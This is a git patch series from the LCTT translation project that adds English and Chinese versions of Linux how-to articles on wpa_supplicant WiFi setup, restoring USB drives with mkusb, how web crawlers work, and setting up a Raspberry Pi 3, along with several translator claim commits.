-# wpa_cli
-> scan
-
-```
-
-The scan will take a couple of minutes, and show you the networks in your area. Notate the one you want to connect to. Type `quit` to exit.
-
-### Generate a Block and Encrypt Your Password
-
-There's an even more convenient utility that you can use to begin setting up your configuration file. It takes the name of your network and the password and creates a file with a configuration block for that network with the password encrypted, so it's not stored in plain text.
-```
-
-# wpa_passphrase networkname password > /etc/wpa_supplicant/wpa_supplicant.conf
-
-```
-
-### Tailor Your Configuration
-
-Now, you have a configuration file located at `/etc/wpa_supplicant/wpa_supplicant.conf`. It's not much, just the network block with your network name and password, but you can build it out from there.
-
-Your file up in your favorite editor, and start by deleting the commented out password line. Then, add the following line to the top of the configuration.
-```
-ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=wheel
-
-```
-
-It just lets users in the `wheel` group manage wpa_supplicant. It can be convenient.
-
-Add the rest of this to the network block itself.
-
-If you're connecting to a hidden network, you can add the following line to tell wpa_supplicant to scan it first.
-```
-scan_ssid=1
-
-```
-
-Next, set the protocol and key management settings. These settings correspond to WPA2.
-```
-proto=RSN
-key_mgmt=WPA-PSK
-
-```
-
-The group and pairwise settings tell wpa_supplicant if you're using CCMP, TKIP, or both. For best security, you should only be using CCMP.
-```
-group=CCMP
-pairwise=CCMP
-
-```
-
-Finally, set the priority of the network. Higher values will connect first.
-```
-priority=10
-
-```
-
-
-![Complete WPA_Supplicant Settings][1]
-Save your configuration and restart wpa_supplicant for the changes to take effect.
-
-### Closing Thoughts
-
-Certainly, this method isn't the best for configuring wireless networks on-the-fly, but it works very well for the networks that you connect to on a regular basis.
-
-
---------------------------------------------------------------------------------
-
-via: https://linuxconfig.org/connect-to-wifi-from-the-linux-command-line
-
-作者:[Nick Congleton][a]
-译者:[lujun9972](https://github.com/lujun9972)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://linuxconfig.org
-[1]:https://linuxconfig.org/images/wpa-cli-config.jpg
diff --git a/translated/tech/20171002 Connect To Wifi From The Linux Command Line.md b/translated/tech/20171002 Connect To Wifi From The Linux Command Line.md
new file mode 100644
index 0000000000..50c25bd839
--- /dev/null
+++ b/translated/tech/20171002 Connect To Wifi From The Linux Command Line.md
@@ -0,0 +1,109 @@
+通过 Linux 命令行连接 Wifi
+======
+
+目标:仅使用命令行工具来配置 WiFi
+
+发行版:适用主流的那些发行版
+
+要求:安装了无线网卡的 Linux 并且拥有 root 权限。
+
+难度:简单
+
+约定:
+
+* `#` - 需要使用 root 权限来执行指定命令,可以直接使用 root 用户来执行,也可以使用 `sudo` 命令
+* `$` - 可以使用普通用户来执行指定命令
+
+
+### 简介
+
+许多人喜欢用图形化的工具来管理电脑,但也有很多人不喜欢这样做。如果你比较喜欢命令行工具,管理 WiFi 会是件很痛苦的事情。然而,事情本不该如此。
+
+wpa_supplicant 可以作为命令行工具来用。使用一个简单的配置文件就可以很容易设置号 WiFi。
+
+### 扫描网络
+
+若你已经知道了网络的信息,就可以跳过这一步。如果不了解的话,则这是一个找出网络信息的好方法。
+
+wpa_supplicant 中有一个工具叫做 `wpa_cli`,它提供了一个命令行接口来管理你的 WiFi 连接。事实上你可以用它来设置任何东西,但是设置一个配置文件看起来要更容易一些。
+
+使用 root 权限运行 `wpa_cli`,然后扫描网络。
+```
+
+# wpa_cli
+> scan
+
+```
+
+扫描过程要花上一点时间,并且会显示所在区域的那些网络。记住你想要连接的那个网络。然后输入 `quit` 退出。
+
+### 生成配置块并且加密你的密码
+
+还有更方便的工具可以用来设置配置文件。它接受网络名称和密码作为参数,然后生成一个包含该网路配置块(其中的密码被加密处理了)的配置文件。
+```
+
+# wpa_passphrase networkname password > /etc/wpa_supplicant/wpa_supplicant.conf
+
+```
+
+### 裁剪你的配置
+
+现在你已经有了一个配置文件了,这个配置文件就是 `/etc/wpa_supplicant/wpa_supplicant.conf`。其中的内容并不多,只有一个网络块,其中有网络名称和密码,不过你可以在此基础上对它进行修改。
+
+用喜欢的编辑器打开该文件,首先删掉说明密码的那行注释。然后,将下面行加到配置最上方。
+```
+ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=wheel
+
+```
+
+这一行只是让 `wheel` 组中的用户可以管理 wpa_supplicant。这会方便很多。
+
+其他的内容则添加到网络块中。
+
+如果你要连接到一个隐藏网络,你可以添加下面行来通知 wpa_supplicant 先扫描该网络。
+```
+scan_ssid=1
+
+```
+
+下一步,设置协议以及密钥管理方面的配置。下面这些是 WPA2 相关的配置。
+```
+proto=RSN
+key_mgmt=WPA-PSK
+
+```
+
+group 和 pairwise 配置告诉 wpa_supplicant 你是否使用了 CCMP,TKIP,或者两者都用到了。为了安全考虑,你应该只用 CCMP。
+```
+group=CCMP
+pairwise=CCMP
+
+```
+
+最后,设置网络优先级。越高的值越会优先连接。
+```
+priority=10
+
+```
+
+![Complete WPA_Supplicant Settings][1]
+
+保存配置然后重启 wpa_supplicant 来让改动生效。
+
+### 结语
+
+当然,该方法并不是用于即时配置无线网络的最好方法,但对于定期连接的网络来说,这种方法非常有效。
+
+
+--------------------------------------------------------------------------------
+
+via: https://linuxconfig.org/connect-to-wifi-from-the-linux-command-line
+
+作者:[Nick Congleton][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://linuxconfig.org
+[1]:https://linuxconfig.org/images/wpa-cli-config.jpg
From 669c4ec6db91154825f20278eaa17d10bd172428 Mon Sep 17 00:00:00 2001
From: Shucheng <741932183@qq.com>
Date: Wed, 10 Jan 2018 22:57:32 +0800
Subject: [PATCH 222/371] Translating by Drshu
---
...4 Restore Corrupted USB Drive To Original State In Linux.md | 3 +++
1 file changed, 3 insertions(+)
diff --git a/sources/tech/20171114 Restore Corrupted USB Drive To Original State In Linux.md b/sources/tech/20171114 Restore Corrupted USB Drive To Original State In Linux.md
index 11cbd66a11..4c9fea02c0 100644
--- a/sources/tech/20171114 Restore Corrupted USB Drive To Original State In Linux.md
+++ b/sources/tech/20171114 Restore Corrupted USB Drive To Original State In Linux.md
@@ -1,5 +1,8 @@
+Translating by Drshus
+
Restore Corrupted USB Drive To Original State In Linux
======
+
![](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/restore-corrupted-usb-drive-to-original-state-in-linux_orig.jpg)
Many times our storage devices like sd cards and Pen drives get corrupted and unusable due to one or other reasons.
From 13250e6781bc1af89317142bc72506a61f6026e3 Mon Sep 17 00:00:00 2001
From: Shucheng <741932183@qq.com>
Date: Wed, 10 Jan 2018 23:38:51 +0800
Subject: [PATCH 223/371] Translated by Drshu
---
...ed USB Drive To Original State In Linux.md | 89 ----------------
...ed USB Drive To Original State In Linux.md | 100 ++++++++++++++++++
2 files changed, 100 insertions(+), 89 deletions(-)
delete mode 100644 sources/tech/20171114 Restore Corrupted USB Drive To Original State In Linux.md
create mode 100644 translated/tech/20171114 Restore Corrupted USB Drive To Original State In Linux.md
diff --git a/sources/tech/20171114 Restore Corrupted USB Drive To Original State In Linux.md b/sources/tech/20171114 Restore Corrupted USB Drive To Original State In Linux.md
deleted file mode 100644
index 4c9fea02c0..0000000000
--- a/sources/tech/20171114 Restore Corrupted USB Drive To Original State In Linux.md
+++ /dev/null
@@ -1,89 +0,0 @@
-Translating by Drshus
-
-Restore Corrupted USB Drive To Original State In Linux
-======
-
-![](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/restore-corrupted-usb-drive-to-original-state-in-linux_orig.jpg)
-Many times our storage devices like sd cards and Pen drives get corrupted and unusable due to one or other reasons.
-
-It may be because of making a bootable media with that device , formatting via wrong platforms or creating partitions in that device.
-
-### Restore Corrupted USB Drive to Original state
-
- [![linux system disk manager](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/usb.png?1510665746)][1]
-
-Warning : The following procedure will format all your data from your device
-
-Whatever the reason, the final outcome is that we are not able to use that device.
-
-So here is a solution to restoring a corrupted usb drive or sd card to its original working state.
-
-Most of the times a simple format via the file browser solves the problem, But for extreme cases where the file manager isn’t helpful and you need your device working, you can follow this guide.
-
-We will be using a small tool called mkusb for this purpose. The installation is easy.
-
-Add the repository tor mkusb.
-
-sudo apt add repository ppa:mkusb/ppa
-
-Now, Update your package lists.
-
-sudo apt-get update
-
-Install mkusb
-
-sudo apt-get install mkusb
-
-Now launch mkusb. You will get this prompt, click ‘Yes’.
-
- [![run mkusb dus](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/editor/run-mkusb.png?1510498592)][2]
-
-Now mkusb will ask you one last time if you wish to proceed with the formatting of the data, ‘Stop’ will be selected by default. You now select ‘Go’ and click ‘OK’.
-
- [![linux mkusb](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/editor/final-checkpoint_1.png?1510499627)][3]
-
-The window will close and your terminal will look like this.
-
- [![mkusb usb console](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/editor/mkusb.png?1510499982)][4]
-
-In a few seconds, the process will be completed and you will get a window popup like this.
-
- [![restore corrupted usb drive](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/editor/usb_1.png?1510500412)][5]
-
-You need to now remove the device from the system and plug it back in. Your device is Restored to a normal device and it will function properly like before.
-
- [![linux disk manager](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/editor/usb_2.png?1510500457)][6]
-
-Now I know all of these could have been done via terminal commands, gparted or some other software etc. But that would require some level of knowledge about partition management.
-
-So it’s always good to have a small tool like this to automate the boring work for you.
-
-### Conclusion
-
-**mkusb**
-
-is a fairly easy to use program that can help you repair your usb storage devices and sd cards. It is available through the mkusb ppa as mkusb. All operations on mkusb will require superuser permissions and all your data on that device will be formatted.
-
-
-
-Once the operation is completed You will have to reattach the device to make it work.
-
-If you have any queries feel free to post them in the comments section below.
-
---------------------------------------------------------------------------------
-
-via: http://www.linuxandubuntu.com/home/restore-corrupted-usb-drive-to-original-state-in-linux
-
-作者:[LINUXANDUBUNTU][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://www.linuxandubuntu.com
-[1]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/usb.png
-[2]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/run-mkusb.png
-[3]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/final-checkpoint_1.png
-[4]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/mkusb.png
-[5]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/usb_1.png
-[6]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/usb_2.png
diff --git a/translated/tech/20171114 Restore Corrupted USB Drive To Original State In Linux.md b/translated/tech/20171114 Restore Corrupted USB Drive To Original State In Linux.md
new file mode 100644
index 0000000000..71aa6d05ec
--- /dev/null
+++ b/translated/tech/20171114 Restore Corrupted USB Drive To Original State In Linux.md
@@ -0,0 +1,100 @@
+在 Linux 上恢复一个损坏的 USB 设备至初始状态
+======
+
+
+
+![](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/restore-corrupted-usb-drive-to-original-state-in-linux_orig.jpg)
+
+很多时候我们诸如 SD 卡和 U 盘这样的储存器可能会被损坏,并且因此或其他原因不能继续使用。
+
+这可能是因为使用这个设备创建了一个引导媒体或者是通过错误的平台格式化亦或是创建了一个新的分区在这个设备上。
+
+### 恢复损坏的 USB 设备至初始状态
+
+ [![Linux 系统磁盘管理器](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/usb.png?1510665746)][1]
+
+警告:接下来的操作会将你设备上的所有数据格式化
+
+
+
+无论什么原因,最终的结果是我们无法继续使用这个设备。
+
+所以这里是一个恢复一个 USB 设备或者是 SD 卡到出厂状态的方法。
+
+大多数时候通过文件浏览器进行一次简单格式化可以解决问题,但是在一些极端情况下,比如文件管理器没有作用,而你又需要你的设备可以继续工作时,你可以使用下面的指导:
+
+我们将会使用一个叫做 mkusb 的小工具来实现目标,这个工具的安装非常简单。
+
+
+
+
+
+1. 添加 mkusb 的仓库
+
+`sudo apt add repository ppa:mkusb/ppa`
+
+2. 现在更新你的包列表
+
+`sudo apt-get update`
+
+3. 安装 mkusb
+
+`sudo apt-get install mkusb`
+
+现在运行 mkusb 你将会看到这个提示,点击 ‘Yes’。
+
+ [![运行 mkusb dus](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/editor/run-mkusb.png?1510498592)][2]
+
+现在 mkusb 将会最后一次询问你是否希望继续格式化你的数据,‘Stop’是被默认选择的,你现在选择 ‘Go’并点击‘OK’。
+
+ [![Linux mkusb](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/editor/final-checkpoint_1.png?1510499627)][3]
+
+窗口将会关闭,摒弃人此时你的终端看起来是这样的。
+
+ [![mkusb usb 控制台](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/editor/mkusb.png?1510499982)][4]
+
+在几秒钟之后,整个过程将会完成,并且你将看到一个这样的弹出窗口。
+
+
+
+ [![恢复损坏的 USB 设备](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/editor/usb_1.png?1510500412)][5]
+
+你现在需要把你的设备从系统推出,然后再重新插进去。你的设备将被恢复成为一个普通设备而且还能像原来一样的工作。
+
+
+
+ [![Linux 磁盘管理器](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/editor/usb_2.png?1510500457)][6]
+
+我们现在所做的操作本可以通过终端命令或是 gparted 或者其他的软件来完成,但是那将会需要一些关于分区管理的知识。
+
+所以有一个像这样可以自动解决专一问题的小工具总是一个好事。
+
+### 结论
+
+**mkusb**
+
+是一个很容易使用的程序,它可以修复你的 USB 储存设备和 SD 卡。mkusb通过 mkusb 的 PPA 来下载。所有在 mkusb 上的操作都需要超级管理员的权限,并且你在这个设备上的所有数据将会被格式化。
+
+一旦操作完成,你将会重置这个设备并让它继续工作。
+
+如果你感到任何疑惑,你可以在下面的评论栏里免费发表。
+
+
+
+--------------------------------------------------------------------------------
+
+via: http://www.linuxandubuntu.com/home/restore-corrupted-usb-drive-to-original-state-in-linux
+
+作者:[LINUXANDUBUNTU][a]
+译者:[Drshu](https://github.com/Drshu)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:http://www.linuxandubuntu.com
+[1]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/usb.png
+[2]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/run-mkusb.png
+[3]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/final-checkpoint_1.png
+[4]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/mkusb.png
+[5]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/usb_1.png
+[6]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/usb_2.png
From f2ef6ee1b50326e9d4e73fe08df6382bbbc97a57 Mon Sep 17 00:00:00 2001
From: geekpi
Date: Thu, 11 Jan 2018 08:50:35 +0800
Subject: [PATCH 224/371] translated
---
...Is A Web Crawler- How Web Crawlers work.md | 53 -------------------
...Is A Web Crawler- How Web Crawlers work.md | 50 +++++++++++++++++
2 files changed, 50 insertions(+), 53 deletions(-)
delete mode 100644 sources/tech/20171230 What Is A Web Crawler- How Web Crawlers work.md
create mode 100644 translated/tech/20171230 What Is A Web Crawler- How Web Crawlers work.md
diff --git a/sources/tech/20171230 What Is A Web Crawler- How Web Crawlers work.md b/sources/tech/20171230 What Is A Web Crawler- How Web Crawlers work.md
deleted file mode 100644
index c364d38cde..0000000000
--- a/sources/tech/20171230 What Is A Web Crawler- How Web Crawlers work.md
+++ /dev/null
@@ -1,53 +0,0 @@
-translating----geekpi
-
-What Is A Web Crawler? How Web Crawlers work?
-======
-![](http://www.theitstuff.com/wp-content/uploads/2017/12/what-is-a-web-crawler-how-web-crawler-works.jpg)
-As an avid Internet junkie, you must have for once in your life come across the word **Web Crawler.** So what is a web crawler, who uses web crawler? How does it work? Let us talk about all of these things in this article.
-
-### **What is a Web Crawler?**
-
-[![web crawler source code sync][1]][1]
-
-A **web crawler** also known as a **web-spider** is an internet software or bot that browses the internet by visiting different pages of many websites. The web crawler retrieves various information from those web pages and stores them in its records. These crawlers are mostly used to gather content from websites to improve searches in a search engine.
-
-### **Who uses Web Crawlers?**
-
-Most search engines use crawlers to gather more and more content from publicly available websites so that they can provide more relevant content to their users.
-
-[![search engines use web crawlers][2]][2]
-
-A lot of commercial organizations use Web Crawlers to specifically search for email addresses and phone numbers of people so that they can later send them promotional offers and other schemes. This is basically spam, but that is how most companies create their mailing list.
-
-Hackers use Web Crawlers to find out all the files in a website's folder mostly HTML and Javascript files. They then try to exploit the website by using XSS.
-
-### **How does a Web Crawler work?**
-
-A Web-Crawler is an automated script which means all of its actions are predefined. A Crawler first begins with an initial list of URLs to visit, these URLs are called seeds. Then it identifies all the hyperlinks to other pages that are listed on the initial seed page. The web crawler then saves these web pages in form of HTML documents which are later worked upon by the search engine and an index is created.
-
-### **Web Crawler and SEO**
-
-Web Crawling affects SEO i.e Search Engine Optimization in a big way. With a major chunk of the users using Google, it is important to get the Google crawlers to index most of your site. This can be done in many ways including not using repeated content and having as many backlinks on other websites. A lot of websites have been seen to abuse these tricks and they eventually get blacklisted by the Engine.
-
-### **Robots.txt**
-
-The robots.txt file is a very special type of file that the crawlers look for when crawling your website. This file usually contains information on how to crawl your website. Some webmasters who purposely do not want their sites indexed can also prevent crawling by using the robots.txt file.
-
-### **Conclusion**
-
-So Crawlers are small software bots that can be used to browse a lot of websites and help the search engine to get the most relevant data from the web.
-
-
---------------------------------------------------------------------------------
-
-via: http://www.theitstuff.com/web-crawler-web-crawlers-work
-
-作者:[Rishabh Kandari][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://www.theitstuff.com/author/reevkandari
-[1]:http://www.theitstuff.com/wp-content/uploads/2017/12/crawler.jpeg
-[2]:http://www.theitstuff.com/wp-content/uploads/2017/12/sengine.png
diff --git a/translated/tech/20171230 What Is A Web Crawler- How Web Crawlers work.md b/translated/tech/20171230 What Is A Web Crawler- How Web Crawlers work.md
new file mode 100644
index 0000000000..a5ddd333d9
--- /dev/null
+++ b/translated/tech/20171230 What Is A Web Crawler- How Web Crawlers work.md
@@ -0,0 +1,50 @@
+什么是网络爬虫?网络爬虫如何工作?
+======
+![](http://www.theitstuff.com/wp-content/uploads/2017/12/what-is-a-web-crawler-how-web-crawler-works.jpg)
+作为一个狂热的互联网人,你在生活中一定遇到过**网络爬虫**这个词。那么什么是网络爬虫,谁使用网络爬虫?它是如何工作的?让我们在本文中讨论这些。
+
+### **什么是网络爬虫?**
+
+[![web crawler source code sync][1]][1]
+
+**网络爬虫**也被称为**网络蜘蛛**是一个在互联网中访问不同网站的不同页面的互联网软件或者机器人。网络爬虫从这些网页中检索各种信息并将其存储在其记录中。这些抓取工具主要用于从网站收集内容以改善搜索引擎的搜索。
+
+### **谁使用网络爬虫?**
+
+大多数搜索引擎使用爬虫来收集来自公共网站的越来越多的内容,以便他们可以向用户提供更多相关内容。
+
+[![search engines use web crawlers][2]][2]
+
+许多商业机构使用网络爬虫专门搜索人们的电子邮件地址和电话号码,以便他们可以向你发送促销优惠和其他方案。这基本上是垃圾邮件,但这是大多数公司创建邮件列表的方式。
+
+黑客使用网络爬虫来查找网站文件夹中的所有文件,主要是 HTML 和 Javascript。然后他们尝试通过使用 XSS 来攻击网站。
+
+### **网络爬虫如何工作?**
+
+网络爬虫是一个自动化脚本,它所有行为都是预定义的。爬虫首先从要访问的 URL 的初始列表开始,这些 URL 称为种子。然后它从初始的种子页面确定所有其他页面的超链接。网络爬虫然后将这些网页以 HTML 文档的形式保存,这些 HTML 文档稍后由搜索引擎处理并创建一个索引。
+
+### **网络爬虫和 SEO**
+
+网络爬虫对 SEO,也就是搜索引擎优化(Search Engine Optimization )有很大的影响。由于许多用户使用 Google,让 Google 爬虫为你的大部分网站建立索引非常重要。这可以通过许多方式来完成,包括不使用重复的内容,并在其他网站上具有尽可能多的反向链接。许多网站被认为是滥用这些技巧,最终被引擎列入黑名单。
+
+### **Robots.txt**
+
+robots.txt 是爬虫在抓取你的网站时寻找的一种非常特殊的文件。该文件通常包含有关如何抓取你的网站的信息。一些网站管理员故意不希望他们的网站被索引也可以通过使用 robots.txt 文件阻止爬虫。
+
+### **总结**
+
+爬虫是一个小的软件机器人,可以用来浏览很多网站,并帮助搜索引擎从网上获得最相关的数据。
+
+--------------------------------------------------------------------------------
+
+via: http://www.theitstuff.com/web-crawler-web-crawlers-work
+
+作者:[Rishabh Kandari][a]
+译者:[geekpi](https://github.com/geekpi)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:http://www.theitstuff.com/author/reevkandari
+[1]:http://www.theitstuff.com/wp-content/uploads/2017/12/crawler.jpeg
+[2]:http://www.theitstuff.com/wp-content/uploads/2017/12/sengine.png
From 5ac34f0f320da932664967cd21b1b05d9282dff3 Mon Sep 17 00:00:00 2001
From: geekpi
Date: Thu, 11 Jan 2018 08:54:19 +0800
Subject: [PATCH 225/371] translating
---
.../tech/20171016 Using the Linux find command with caution.md | 2 ++
1 file changed, 2 insertions(+)
diff --git a/sources/tech/20171016 Using the Linux find command with caution.md b/sources/tech/20171016 Using the Linux find command with caution.md
index 2093308d9f..bb43f2cd76 100644
--- a/sources/tech/20171016 Using the Linux find command with caution.md
+++ b/sources/tech/20171016 Using the Linux find command with caution.md
@@ -1,3 +1,5 @@
+translating---geekpi
+
Using the Linux find command with caution
======
![](https://images.idgesg.net/images/article/2017/10/caution-sign-100738884-large.jpg)
From cffa610c60600f73671d82605c1d94d02677136d Mon Sep 17 00:00:00 2001
From: qhwdw
Date: Thu, 11 Jan 2018 09:25:55 +0800
Subject: [PATCH 226/371] Translating by qhwdw
---
sources/tech/20170502 A beginner-s guide to Raspberry Pi 3.md | 1 +
1 file changed, 1 insertion(+)
diff --git a/sources/tech/20170502 A beginner-s guide to Raspberry Pi 3.md b/sources/tech/20170502 A beginner-s guide to Raspberry Pi 3.md
index 7a0e9b4805..f7e8913962 100644
--- a/sources/tech/20170502 A beginner-s guide to Raspberry Pi 3.md
+++ b/sources/tech/20170502 A beginner-s guide to Raspberry Pi 3.md
@@ -1,3 +1,4 @@
+Translating by qhwdw
A beginner’s guide to Raspberry Pi 3
======
![](https://images.techhive.com/images/article/2017/03/raspberry2-100711632-large.jpeg)
From 60800318112bbd940467d3b34e67d706769c9bd5 Mon Sep 17 00:00:00 2001
From: Flowsnow
Date: Thu, 11 Jan 2018 10:16:33 +0800
Subject: [PATCH 227/371] =?UTF-8?q?=E7=94=B3=E8=AF=B7=E7=BF=BB=E8=AF=91-20?=
=?UTF-8?q?171107=20How=20To=20Protect=20Server=20Against=20Brute=20Force?=
=?UTF-8?q?=20Attacks=20With=20Fail2ban=20On=20Linux.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...erver Against Brute Force Attacks With Fail2ban On Linux.md | 3 +++
1 file changed, 3 insertions(+)
diff --git a/sources/tech/20171107 How To Protect Server Against Brute Force Attacks With Fail2ban On Linux.md b/sources/tech/20171107 How To Protect Server Against Brute Force Attacks With Fail2ban On Linux.md
index 0a1a27855e..55e7a7d17a 100644
--- a/sources/tech/20171107 How To Protect Server Against Brute Force Attacks With Fail2ban On Linux.md
+++ b/sources/tech/20171107 How To Protect Server Against Brute Force Attacks With Fail2ban On Linux.md
@@ -1,5 +1,8 @@
+translating by Flowsnow
+
How To Protect Server Against Brute Force Attacks With Fail2ban On Linux
======
+
One of the important task for Linux administrator is to protect server against illegitimate attack or access. By default Linux system comes with well-configured firewall such as Iptables, Uncomplicated Firewall (UFW), ConfigServer Security Firewall (CSF), etc, which will prevent many kinds of attacks.
Any machine which is connected to the internet is a potential target for malicious attacks. There is a tool called fail2ban is available to mitigate illegitimate access on server.
From bb753fe78cc203c3da9c342ceb9fc1d45341c65c Mon Sep 17 00:00:00 2001
From: qhwdw
Date: Thu, 11 Jan 2018 10:56:06 +0800
Subject: [PATCH 228/371] Translated by qhwdw
---
.../tech/20170502 A beginner-s guide to Raspberry Pi 3.md | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename {sources => translated}/tech/20170502 A beginner-s guide to Raspberry Pi 3.md (100%)
diff --git a/sources/tech/20170502 A beginner-s guide to Raspberry Pi 3.md b/translated/tech/20170502 A beginner-s guide to Raspberry Pi 3.md
similarity index 100%
rename from sources/tech/20170502 A beginner-s guide to Raspberry Pi 3.md
rename to translated/tech/20170502 A beginner-s guide to Raspberry Pi 3.md
From f63b188ef253ce2ab42cc8f29766b396d381d3ca Mon Sep 17 00:00:00 2001
From: qhwdw
Date: Thu, 11 Jan 2018 10:56:36 +0800
Subject: [PATCH 229/371] Translated by qhwdw
---
...02 A beginner-s guide to Raspberry Pi 3.md | 77 +++++++++----------
1 file changed, 38 insertions(+), 39 deletions(-)
diff --git a/translated/tech/20170502 A beginner-s guide to Raspberry Pi 3.md b/translated/tech/20170502 A beginner-s guide to Raspberry Pi 3.md
index f7e8913962..b53c397aed 100644
--- a/translated/tech/20170502 A beginner-s guide to Raspberry Pi 3.md
+++ b/translated/tech/20170502 A beginner-s guide to Raspberry Pi 3.md
@@ -1,103 +1,102 @@
-Translating by qhwdw
-A beginner’s guide to Raspberry Pi 3
+一个树莓派 3 的新手指南
======
![](https://images.techhive.com/images/article/2017/03/raspberry2-100711632-large.jpeg)
-This article is part of a weekly series where I'll create new projects using Raspberry Pi 3. The first article of the series focusses on getting you started and will cover the installation of Raspbian, with PIXEL desktop, setting up networking and some basics.
+这篇文章是我的使用树莓派 3 创建新项目的每周系列文章的一部分。该系列的第一篇文章专注于入门,它主要讲使用 PIXEL 桌面去安装树莓派、设置网络以及其它的基本组件。
-### What you need:
+### 你需要:
- * A Raspberry Pi 3
- * A 5v 2mAh power supply with mini USB pin
- * Micro SD card with at least 8GB capacity
- * Wi-Fi or Ethernet cable
- * Heat sink
- * Keyboard and mouse
- * a PC monitor
- * A Mac or PC to prepare microSD card.
+ * 一台树莓派 3
+ * 一个 5v 2mAh 带 USB 接口的电源适配器
+ * 至少 8GB 容量的 Micro SD 卡
+ * Wi-Fi 或者以太网线
+ * 散热片
+ * 键盘和鼠标
+ * 一台 PC 显示器
+ * 一台用于准备 microSD 卡的 Mac 或者 PC
-There are many Linux-based operating systems available for Raspberry Pi that you can install directly, but if you're new to the Pi, I suggest NOOBS, the official OS installer for Raspberry Pi that simplifies the process of installing an OS on the device.
+现在市面上有很多基于 Linux 操作系统的树莓派,这种树莓派你可以直接安装它,但是,如果你是第一次接触树莓派,我推荐使用 NOOBS,它是树莓派官方的操作系统安装器,它安装操作系统到设备的过程非常简单。
-Download NOOBS from [this link][1] on your system. It's a compressed .zip file. If you're on MacOS, just double click on it and MacOS will automatically uncompress the files. If you are on Windows, right-click on it, and select "extract here."
+在你的电脑上从 [这个链接][1] 下载 NOOBS。它是一个 zip 压缩文件。如果你使用的是 MacOS,可以直接双击它,MacOS 会自动解压这个文件。如果你使用的是 Windows,右键单击它,选择“解压到这里”。
-If you're running desktop Linux, then how to unzip it really depends on the desktop environment you are running, as different DEs have different ways of doing the same thing. So the easiest way is to use the command line.
+如果你运行的是 Linux,如何去解压 zip 文件取决于你的桌面环境,因为,不同的桌面环境下解压文件的方法不一样,但是,使用命令行可以很容易地完成解压工作。
`$ unzip NOOBS.zip`
-Irrespective of the operating system, open the unzipped file and check if the file structure looks like this:
+不管它是什么操作系统,打开解压后的文件,你看到的应该是如下图所示的样子:
![content][3] Swapnil Bhartiya
-Now plug the Micro SD card to your PC and format it to the FAT32 file system. On MacOS, use the Disk Utility tool and format the Micro SD card:
+现在,在你的 PC 上插入 Micro SD 卡,将它格式化成 FAT32 格式的文件系统。在 MacOS 上,使用磁盘实用工具去格式化 Micro SD 卡:
![format][4] Swapnil Bhartiya
-On Windows, just right click on the card and choose the formatting option. If you're on desktop Linux, different DEs use different tools, and covering all the DEs is beyond the scope of this story. I have written a tutorial [using the command line interface on Linux][5] to format an SD card with Fat32 file system.
+在 Windows 上,只需要右键单击这个卡,然后选择“格式化”选项。如果是在 Linux 上,不同的桌面环境使用不同的工具,就不一一去讲解了。在这里我写了一个教程,[在 Linux 上使用命令行接口][5] 去格式化 SD 卡为 Fat32 文件系统。
-Once you have the card formatted in the Fat32 partition, just copy the content of the downloaded NOOBS directory into the root directory of the device. If you are on MacOS or Linux, just rsync the content of NOOBS to the SD card. Open Terminal app in MacOS or Linux and run the rsync command in this format:
+在你拥有了 FAT32 格式的文件系统后,就可以去拷贝下载的 NOOBS 目录的内容到这个卡的根目录下。如果你使用的是 MacOS 或者 Linux,可以使用 rsync 将 NOOBS 的内容传到 SD 卡的根目录中。在 MacOS 或者 Linux 中打开终端应用,然后运行如下的 rsync 命令:
`rsync -avzP /path_of_NOOBS /path_of_sdcard`
-Make sure to select the root directory of the sd card. In my case (on MacOS), it was:
